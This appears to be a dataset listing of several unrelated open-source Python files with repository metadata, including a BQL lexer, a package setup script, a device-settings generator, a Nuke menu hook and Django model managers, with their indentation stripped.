def scan_quoted_end(scanner, text, token):
assert scanner.stringio is not None
string = scanner.stringio.getvalue()
scanner.stringio.close()
scanner.stringio = None
scanner.produce(token, string)
scanner.begin("")
class BQLScanner(Plex.Scanner):
line_comment = Plex.Str("--") + Plex.Rep(Plex.AnyBut("\n"))
whitespace = Plex.Any("\f\n\r\t ")
# XXX Support non-US-ASCII Unicode text.
letter = Plex.Range("azAZ")
digit = Plex.Range("09")
digits = Plex.Rep(digit)
digits1 = Plex.Rep1(digit)
hexit = digit | Plex.Range("afAF")
hexits1 = Plex.Rep1(hexit)
integer_dec = digits1
integer_hex = Plex.Str("0x", "0X") + hexits1
dot = Plex.Str('.')
intfrac = digits1 + dot + digits
fraconly = dot + digits1
optsign = Plex.Opt(Plex.Any('+-'))
expmark = Plex.Any('eE')
exponent = expmark + optsign + digits1
optexp = Plex.Opt(exponent)
float_dec = ((intfrac | fraconly) + optexp) | (digits1 + exponent)
name_special = Plex.Any("_$")
name = (letter | name_special) + Plex.Rep(letter | digit | name_special)
lexicon = Plex.Lexicon([
(whitespace, Plex.IGNORE),
(line_comment, Plex.IGNORE),
(Plex.Str(";"), grammar.T_SEMI),
(Plex.Str("{"), grammar.T_LCURLY),
(Plex.Str("}"), grammar.T_RCURLY),
(Plex.Str("("), grammar.T_LROUND),
(Plex.Str(")"), grammar.T_RROUND),
(Plex.Str("+"), grammar.T_PLUS),
(Plex.Str("-"), grammar.T_MINUS),
(Plex.Str("*"), grammar.T_STAR),
(Plex.Str("/"), grammar.T_SLASH),
(Plex.Str("%"), grammar.T_PERCENT),
(Plex.Str("="), grammar.T_EQ),
(Plex.Str("=="), grammar.T_EQ),
(Plex.Str("<"), grammar.T_LT),
(Plex.Str("<>"), grammar.T_NEQ),
(Plex.Str("<="), grammar.T_LEQ),
(Plex.Str(">"), grammar.T_GT),
(Plex.Str(">="), grammar.T_GEQ),
(Plex.Str("<<"), grammar.T_LSHIFT),
(Plex.Str(">>"), grammar.T_RSHIFT),
(Plex.Str("!="), grammar.T_NEQ),
(Plex.Str("|"), grammar.T_BITIOR),
(Plex.Str("||"), grammar.T_CONCAT),
(Plex.Str(","), grammar.T_COMMA),
(Plex.Str("&"), grammar.T_BITAND),
(Plex.Str("~"), grammar.T_BITNOT),
(Plex.Str("."), grammar.T_DOT),
(Plex.Str("?"), scan_numpar_next),
(Plex.Str("?") + integer_dec,
scan_numpar),
(Plex.Str(":") + name, scan_nampar),
(Plex.Str("@") + name, scan_nampar),
(Plex.Str("$") + name, scan_nampar),
(Plex.Str("'"), scan_string_start),
(Plex.Str('"'), scan_qname_start),
(name, scan_name),
(integer_dec, scan_integer),
(integer_hex, scan_integer),
(float_dec, scan_float),
(integer_dec + name, scan_bad),
(integer_hex + name, scan_bad),
(float_dec + name, scan_bad),
(Plex.AnyChar, scan_bad),
Plex.State("STRING", [
(Plex.Str("'"), scan_string_end),
(Plex.Str("''"), scan_quoted_quote),
(Plex.Rep1(Plex.AnyBut("'")), scan_quoted_text),
]),
Plex.State("QNAME", [
(Plex.Str('"'), scan_qname_end),
(Plex.Str('""'), scan_quoted_quote),
(Plex.Rep1(Plex.AnyBut('"')), scan_quoted_text),
]),
])
def __init__(self, f, context):
Plex.Scanner.__init__(self, self.lexicon, f, context)
self.stringio = None
self.stringquote = None
self.n_numpar = 0
self.nampar_map = {}
def produce(self, token, value=None):
if token is None: # EOF
token = 0
Plex.Scanner.produce(self, token, value)
|
setup.py | danieldaeschle/swapy | 834 | 12664959 | from setuptools import setup
setup(
name='swapy',
version='0.2.2',
description='Easy and modular web development',
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/danieldaeschle/swapy',
packages=['swapy'],
install_requires=['werkzeug', 'jinja2'],
license='MIT'
)
|
tools/gen_nvm_devices.py | Neradoc/circuitpython | 3,010 | 12664964 | import sys
import cascadetoml
import pathlib
import typer
from jinja2 import Template
def main(input_template: pathlib.Path, output_path: pathlib.Path):
flashes = cascadetoml.filter_toml(pathlib.Path("../../data/nvm.toml"), [])
template = Template(input_template.read_text())
settings = {"nvms": []}
for flash in flashes["nvm"]:
if "sku" not in flash or flash["sku"] == flash["manufacturer"]:
continue
settings["nvms"].append(dict(flash))
output_path.write_text(template.render(settings))
if __name__ == "__main__":
typer.run(main)
|
setup/nuke/nuke_path/menu.py | bumpybox/core | 168 | 12664968 | import avalon.api
import avalon.nuke
avalon.api.install(avalon.nuke)
|
dictionary/models/managers/entry.py | ankitgc1/django-sozluk-master | 248 | 12665016 | <filename>dictionary/models/managers/entry.py
from django.db import models
from django.db.models import Q
class EntryManager(models.Manager):
# Includes ONLY the PUBLISHED entries by NON-NOVICE authors
def get_queryset(self):
return super().get_queryset().exclude(Q(is_draft=True) | Q(author__is_novice=True))
class EntryManagerAll(models.Manager):
# Includes ALL entries (entries by novices, drafts)
pass
class EntryManagerOnlyPublished(models.Manager):
# Includes ONLY the PUBLISHED entries (entries by NOVICE users still visible)
def get_queryset(self):
return super().get_queryset().exclude(is_draft=True)
|
tests/CompileTests/Python_tests/test2011_007.py | maurizioabba/rose | 488 | 12665018 | <gh_stars>100-1000
def foo(bar):
bar + 1
|
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.